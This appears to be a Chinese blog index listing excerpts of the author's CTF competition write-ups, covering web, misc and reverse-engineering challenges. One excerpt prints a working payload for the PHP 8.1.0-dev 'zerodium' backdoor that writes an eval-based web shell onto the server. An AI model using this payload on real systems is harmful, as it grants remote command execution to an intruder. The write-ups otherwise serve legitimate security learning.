摘要:
四周的比赛,终于落下帷幕了。 学到不少东西,主要是审计代码这一方面吧,虽然第四周也没做出几个题呃呃,再接再厉吧大嗨阔! 因为环境关了没来得及复现,网上其他师傅也没复现,只能看官方wp硬写了。 i-short-you-1 一眼java反序列化写poc,但做出来的人就几个,这就是java反序列化的魅力吧 阅读全文
摘要:
WEB PHP的后门 bp抓包发现版本为8.0.1,网上搜到poc: PHP 8.1.0-dev后门复现-CSDN博客 直接 User-Agentt: zerodiumfile_put_contents('indexs111.php','<?php eval($_POST["cmd"]);?>'); 阅读全文
摘要:
三道web,搓出来两道,还是可以了哈哈哈哈哈~~~ 直接长话短说。 WebVPN js原型链污染。 首先审计源码,index看到个登录路由: 重点就是app.js: const express = require("express"); const axios = require("axios"); 阅读全文
摘要:
不务正业web手,在线打misc娱乐娱乐哈哈哈哈哈,虽然好多都也是零基础现学或者复现的。 WEEK1 签到不说了,signin从手机充电口看。 simple_attack 下载下来拿到个图片和压缩包, 而且压缩包里面的图片跟外面的图片名字是一样的: 直接猜是明文攻击: 将图片进行压缩(使用bandz 阅读全文
摘要:
Checkin 简单的js,没有混淆,源码里找到可疑十六进制字符串,在控制台直接console.log()就出了。 CutePath 有点搞。 网上搜到的Cutehttpserver CVE是XSS,但是这个CVE是v1.x和v2.x的,所以应该用不了。 这里卡住了,点联系进入项目官网,然后进git 阅读全文
摘要:
除了java那道和XSS那道,其他挺简单。 What the cow say? 直接可以命令注入,发现flag字符被ban了,但不能直接注入,包裹反引号直接RCE: 一条龙: Select More Courses 进去后提示弱密码,但是一直找不到对的,dirsearch也搜不到: 还以为方向错了, 阅读全文
摘要:
难度大体也还是简单,但是有些题还是有水平的。 POPgadget 逆天签到题。 自己看源码就知道我为啥这么说了: <?php highlight_file(__FILE__); class Fun{ private $func = 'call_user_func_array'; public fun 阅读全文
摘要:
没想到Re比web还简单呃呃: ezIDA IDA打开就看到了。 ezASM 丢chatgpt就出了。 ezUPX 先拿去upx脱个壳,然后IDA打开找到加密算法,就是个简单的异或,exp: ida_chars = [ 0x64, 0x7B, 0x76, 0x73, 0x60, 0x49, 0x65 阅读全文
摘要:
第一周算是入门难度,还是很简单的,直接上哥们的wp: ezHTTP 入门级别的几个http点,注意一下后面用X-Real-IP就行。 Bypass it 注册是post发包,说是不让你注册,查看源码看到个register.php,直接对这个发包,注册成功然后登录就出了。 Select Courses 阅读全文
摘要:
期末考完了,芜湖~~~~复工! NCTF好巧不巧出在我们期末周复习的时间,当时也只是上线看了一点,有些题有点思路,但是还是因为积累知识不足,想不出什么姿势。 现在能复现出的就尽量看看吧。 logging 记忆犹新,因为队里一个佬来了一看,说是一眼签到题,哈哈哈哈哈哈。 Java安全以前没怎么接触过, 阅读全文